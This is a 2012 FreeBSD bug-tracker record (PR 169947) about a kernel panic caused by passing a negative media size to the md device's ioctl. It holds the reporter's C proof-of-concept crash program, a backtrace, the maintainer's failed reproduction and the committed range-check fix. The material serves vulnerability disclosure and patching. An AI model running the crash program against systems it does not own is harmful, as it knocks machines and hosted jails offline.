From nobody@FreeBSD.org  Tue Jul 17 17:50:26 2012
Return-Path: <nobody@FreeBSD.org>
Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52])
	by hub.freebsd.org (Postfix) with ESMTP id 214D21065672
	for <freebsd-gnats-submit@FreeBSD.org>; Tue, 17 Jul 2012 17:50:26 +0000 (UTC)
	(envelope-from nobody@FreeBSD.org)
Received: from red.freebsd.org (red.freebsd.org [IPv6:2001:4f8:fff6::22])
	by mx1.freebsd.org (Postfix) with ESMTP id 0C6B58FC17
	for <freebsd-gnats-submit@FreeBSD.org>; Tue, 17 Jul 2012 17:50:26 +0000 (UTC)
Received: from red.freebsd.org (localhost [127.0.0.1])
	by red.freebsd.org (8.14.4/8.14.4) with ESMTP id q6HHoP5A098958
	for <freebsd-gnats-submit@FreeBSD.org>; Tue, 17 Jul 2012 17:50:25 GMT
	(envelope-from nobody@red.freebsd.org)
Received: (from nobody@localhost)
	by red.freebsd.org (8.14.4/8.14.4/Submit) id q6HHoPQ2098957;
	Tue, 17 Jul 2012 17:50:25 GMT
	(envelope-from nobody)
Message-Id: <201207171750.q6HHoPQ2098957@red.freebsd.org>
Date: Tue, 17 Jul 2012 17:50:25 GMT
From: Filip Palian <filip.palian@pjwstk.edu.pl>
To: freebsd-gnats-submit@FreeBSD.org
Subject: System crash via ioctl() on mdctl.
X-Send-Pr-Version: www-3.1
X-GNATS-Notify:

>Number:         169947
>Category:       kern
>Synopsis:       [md] [patch] System crash via ioctl() on mdctl.
>Confidential:   no
>Severity:       non-critical
>Priority:       low
>Responsible:    jh
>State:          patched
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Tue Jul 17 18:00:22 UTC 2012
>Closed-Date:    
>Last-Modified:  Thu Aug 02 15:17:24 UTC 2012
>Originator:     Filip Palian
>Release:        FreeBSD 9.0-RELEASE #0
>Organization:
>Environment:
FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012 root at obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386
>Description:
User who has read permission on "/dev/mdctl" is able to crash the system (also within the jail if only provided by devfs(.rules)) via ioctl() handler in "/usr/src/sys/dev/md/md.c:1082". The crash occures in function swap_release_by_cred() (swap_pager.c:285) called in vm_object_deallocate() (md.c:1119). Some detailed information included below.

-- cut --
fbsd dumped core - see /var/crash/vmcore.0
.
panic: swap_reserved < decr
.
Unread portion of the kernel message buffer:

panic: swap_reserved < decr
cpuid = 0
KDB: stack backtrace:
#0 0xc0a4b1d7 at kdb_backtrace+0x47
#1 0xc0a18737 at panic+0x117
#2 0xc0c6d147 at swap_release_by_cred+0x97    <--- paniced here
#3 0xc0c85684 at vm_object_destroy+0xd4
#4 0xc0c87825 at vm_object_terminate+0x2c5
#5 0xc0c880a7 at vm_object_deallocate+0x877
#6 0xc0c7da51 at vm_map_entry_deallocate+0x21
#7 0xc0c7daba at vm_map_process_deferred+0x2a
#8 0xc0c7ebfa at _vm_map_unlock+0x4a
#9 0xc0c7f2eb at vm_map_remove+0x6b
#10 0xc0c82543 at vmspace_exit+0xc3
#11 0xc09e9038 at exit1+0x6f8
#12 0xc09e9d7d at sys_sys_exit+0x1d
#13 0xc0d4c275 at syscall+0x355
#14 0xc0d35a51 at Xint0x80_syscall+0x21
Uptime: 2h36m43s
Physical memory: 1383 MB
Dumping 80 MB: 65 49 33 17 1
-- cut --
>How-To-Repeat:
Compile and execute the code from the attachment.
>Fix:
The "mediasize" member of the "md_s" structure should be of unsigned type. Currently it's of type off_t, which is "typedef long __int64_t".

Alternative solution would be to add the following sanity condition in md.c:1091 (not mentioning the author's comment):

-- cut --
--- dev/md/md.c.old     2012-07-15 21:32:40.000000000 +0200
+++ dev/md/md.c 2012-07-15 21:30:00.000000000 +0200
@@ -1088,7 +1088,7 @@ mdcreate_swap(struct md_s *sc, struct md
         * Range check.  Disallow negative sizes or any size less then the
         * size of a page.  Then round to a page.
         */
-       if (sc->mediasize == 0 || (sc->mediasize % PAGE_SIZE) != 0)
+       if (sc->mediasize <= 0 || (sc->mediasize % PAGE_SIZE) != 0)
                return (EDOM);

        /*
-- cut --

To prevent evil users from doing bad things administrators should ensure, that "/dev/mdctl" permissions are +rw (600) only for root.

For servers where jails are provided for untrusted users (e.g. hosting companies) access to "/dev/mdctl" device should be forbidden/hidden using defvs.rules.

Patch attached with submission follows:

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mdioctl.h>
#include <sys/mman.h>


int main()
{
	int f;
	void *p;
	struct md_ioctl s;
	struct stat ss;

	s.md_version = MDIOVERSION;
	// s.md_type = MD_SWAP;
	s.md_type = MD_PRELOAD;
	s.md_options = MD_CLUSTER | MD_AUTOUNIT | MD_COMPRESS;

	// typedef long long = int64 = off_t
	//s.md_mediasize = 4096*1000000000000000000000000000000000000000000000000000;
	s.md_mediasize = -1000000000000;

	if (stat("/dev/mdctl", &ss) != 0) {
		printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno));
		exit (0);
	}


	f = open("/dev/mdctl", O_RDONLY, 0);

	printf("say goodnight...\n");

	if (ioctl(f, MDIOCATTACH, &s) < 0)
	      	printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno));

	printf("no +r no fun\n");

	exit (0);
}

>Release-Note:
>Audit-Trail:
State-Changed-From-To: open->open 
State-Changed-By: linimon 
State-Changed-When: Tue Jul 17 21:45:43 UTC 2012 
State-Changed-Why:  
reclassify. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169947 

From: Jaakko Heinonen <jh@FreeBSD.org>
To: Filip Palian <filip.palian@pjwstk.edu.pl>
Cc: bug-followup@FreeBSD.org
Subject: Re: misc/169947: System crash via ioctl() on mdctl.
Date: Wed, 18 Jul 2012 16:33:39 +0300

 On 2012-07-17, Filip Palian wrote:
 > User who has read permission on "/dev/mdctl" is able to crash the
 > system (also within the jail if only provided by devfs(.rules)) via
 > ioctl() handler in "/usr/src/sys/dev/md/md.c:1082". The crash occures
 > in function swap_release_by_cred() (swap_pager.c:285) called in
 > vm_object_deallocate() (md.c:1119). Some detailed information included
 > below.
 > 
 > Patch attached with submission follows:
 > 
 > #include <stdio.h>
 > #include <stdlib.h>
 
 I couldn't reproduce the problem with your test program on current or
 stable/9:
 
 $ ./mdtest.orig 
 say goodnight...
 ioctl(MDIOCATTACH) failed: Invalid argument
 no +r no fun
 
 I tried to modify the test program with following changes but still no
 success.
 
 %%%
 --- mdtest.c	2012-07-18 16:13:34.000000000 +0300
 +++ mdtest.c	2012-07-18 16:17:05.000000000 +0300
 @@ -21,7 +21,8 @@
  	s.md_version = MDIOVERSION;
  	// s.md_type = MD_SWAP;
  	s.md_type = MD_PRELOAD;
 -	s.md_options = MD_CLUSTER | MD_AUTOUNIT | MD_COMPRESS;
 +	s.md_base = -1;
 +	s.md_options = MD_AUTOUNIT;
  
  	// typedef long long = int64 = off_t
  	//s.md_mediasize = 4096*1000000000000000000000000000000000000000000000000000;
 %%%
 
 
 $ ./mdtest 
 say goodnight...
 no +r no fun
 
 A new md device is successfully created.
 
 Are you sure that you attached the correct test program and you didn't
 have local patches applied to your kernel?
 
 -- 
 Jaakko
Responsible-Changed-From-To: freebsd-bugs->jh 
Responsible-Changed-By: jh 
Responsible-Changed-When: Wed Jul 18 13:58:57 UTC 2012 
Responsible-Changed-Why:  
Track. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169947 

From: dfilter@FreeBSD.ORG (dfilter service)
To: bug-followup@FreeBSD.org
Cc:  
Subject: Re: kern/169947: commit references a PR
Date: Thu,  2 Aug 2012 15:05:49 +0000 (UTC)

 Author: jh
 Date: Thu Aug  2 15:05:34 2012
 New Revision: 238991
 URL: http://svn.freebsd.org/changeset/base/238991
 
 Log:
   Disallow sectorsize larger than MAXPHYS and mediasize smaller than
   sectorsize.
   
   PR:		169947
   Submitted by:	Filip Palian (original version)
   Reviewed by:	kib
 
 Modified:
   head/sys/dev/md/md.c
 
 Modified: head/sys/dev/md/md.c
 ==============================================================================
 --- head/sys/dev/md/md.c	Thu Aug  2 13:57:49 2012	(r238990)
 +++ head/sys/dev/md/md.c	Thu Aug  2 15:05:34 2012	(r238991)
 @@ -1090,7 +1090,7 @@ mdresize(struct md_s *sc, struct md_ioct
  	case MD_VNODE:
  		break;
  	case MD_SWAP:
 -		if (mdio->md_mediasize == 0 ||
 +		if (mdio->md_mediasize <= 0 ||
  		    (mdio->md_mediasize % PAGE_SIZE) != 0)
  			return (EDOM);
  		oldpages = OFF_TO_IDX(round_page(sc->mediasize));
 @@ -1148,7 +1148,7 @@ mdcreate_swap(struct md_s *sc, struct md
  	 * Range check.  Disallow negative sizes or any size less then the
  	 * size of a page.  Then round to a page.
  	 */
 -	if (sc->mediasize == 0 || (sc->mediasize % PAGE_SIZE) != 0)
 +	if (sc->mediasize <= 0 || (sc->mediasize % PAGE_SIZE) != 0)
  		return (EDOM);
  
  	/*
 @@ -1189,6 +1189,7 @@ xmdctlioctl(struct cdev *dev, u_long cmd
  	struct md_ioctl *mdio;
  	struct md_s *sc;
  	int error, i;
 +	unsigned sectsize;
  
  	if (md_debug)
  		printf("mdctlioctl(%s %lx %p %x %p)\n",
 @@ -1217,6 +1218,12 @@ xmdctlioctl(struct cdev *dev, u_long cmd
  		default:
  			return (EINVAL);
  		}
 +		if (mdio->md_sectorsize == 0)
 +			sectsize = DEV_BSIZE;
 +		else
 +			sectsize = mdio->md_sectorsize;
 +		if (sectsize > MAXPHYS || mdio->md_mediasize < sectsize)
 +			return (EINVAL);
  		if (mdio->md_options & MD_AUTOUNIT)
  			sc = mdnew(-1, &error, mdio->md_type);
  		else {
 @@ -1229,10 +1236,7 @@ xmdctlioctl(struct cdev *dev, u_long cmd
  		if (mdio->md_options & MD_AUTOUNIT)
  			mdio->md_unit = sc->unit;
  		sc->mediasize = mdio->md_mediasize;
 -		if (mdio->md_sectorsize == 0)
 -			sc->sectorsize = DEV_BSIZE;
 -		else
 -			sc->sectorsize = mdio->md_sectorsize;
 +		sc->sectorsize = sectsize;
  		error = EDOOFUS;
  		switch (sc->type) {
  		case MD_MALLOC:
 @@ -1282,6 +1286,8 @@ xmdctlioctl(struct cdev *dev, u_long cmd
  		sc = mdfind(mdio->md_unit);
  		if (sc == NULL)
  			return (ENOENT);
 +		if (mdio->md_mediasize < sc->sectorsize)
 +			return (EINVAL);
  		if (mdio->md_mediasize < sc->mediasize &&
  		    !(sc->flags & MD_FORCE) &&
  		    !(mdio->md_options & MD_FORCE))
 _______________________________________________
 svn-src-all@freebsd.org mailing list
 http://lists.freebsd.org/mailman/listinfo/svn-src-all
 To unsubscribe, send any mail to "svn-src-all-unsubscribe@freebsd.org"
 
State-Changed-From-To: open->patched 
State-Changed-By: jh 
State-Changed-When: Thu Aug 2 15:16:47 UTC 2012 
State-Changed-Why:  
Patched in head (r238991). Thanks! 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169947 
>Unformatted:
